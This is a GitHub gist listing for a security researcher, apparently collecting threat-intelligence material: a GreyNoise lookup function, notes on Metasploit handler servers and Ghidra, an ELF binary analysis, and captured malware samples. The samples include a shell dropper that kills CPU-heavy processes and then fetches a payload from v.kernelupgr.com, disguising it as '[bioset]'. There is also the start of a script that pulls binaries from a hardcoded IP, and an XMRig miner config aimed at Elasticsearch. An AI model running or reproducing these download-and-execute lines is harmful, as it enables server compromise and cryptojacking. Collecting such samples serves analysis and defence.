Remco Verhoef nl5887

@nl5887
nl5887 / gist:0a55e297aad9bf5f4882deb44ea0ef79
Created Mar 18, 2019
fish function to query greynoise for specific ip
View gist:0a55e297aad9bf5f4882deb44ea0ef79
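function greynoise
    # Require an IP address as the first argument
    if test (count $argv) -eq 0
        echo "No arguments specified. Usage:"
        echo "greynoise {ip}"
        return 1
    end
    set ip $argv[1]
    # Query the GreyNoise API for the IP and pretty-print the JSON response
    curl -s -XPOST -d "ip=$ip" 'http://api.greynoise.io:8888/v1/query/ip' | jq '.'
end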
nl5887 / 001_readme.md
Last active Apr 18, 2019
Metasploit Meterpreter handler servers (HTTP/HTTPS)
View 001_readme.md

This gist contains a list of verified Metasploit Meterpreter http(s) handlers and PowerShell Empire http(s) listeners.

Servers could be malicious, or just part of a red teaming action.

Thanks to censys.io and Jose.

nl5887 / 00_readme.md
Last active Jun 4, 2019
Ghidra decompile
View 00_readme.md

Ghidra decompiler

This Python script communicates with the Ghidra decompiler. Currently it succeeds in communicating, sending hardcoded opcodes and returning decompiled code.

Currently working on reversing the getPcodePacked command.

Next steps:

  • implement exception handling
  • implement callbacks
  • allow decompilation of custom payloads
View all
ps aux |awk '$3>40.0{print $2}'|xargs kill -9
cd /tmp
if [ $? -ne 0 ]
then
export PATH=`pwd`:$PATH
else
export PATH=/tmp:$PATH
fi
wget -q v.kernelupgr.com/d/vv -O \[bioset\] || curl -s v.kernelupgr.com/d/vv -o \[bioset\]
chmod +x \[bioset\]
View a
#!/bin/sh
# Edit
WEBSERVER="209.141.50.26"
# Stop editing now
BINARIES="arm arm7 arm64"
for Binary in $BINARIES; do
View gist:e7b044f7d264dba7d88daed49a3c084e
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2012-2017 Matt Martz
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
View gist:9cb88cf2ef9849d3873b611bce3b0aaa
View gist:9f3413ed486b117134c59aa4daee17b8
MD5 (/Users/remco/Downloads/paimon.x86) = 5efce325c5aa2fa11553bf6a4bd94b74
arch x86
baddr 0x8048000
binsz 37184
bintype elf
bits 32
canary false
sanitiz false
class ELF32
nl5887 / config.json
Last active Nov 29, 2018
Targeting Elasticsearch
View config.json
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 3, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 65, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.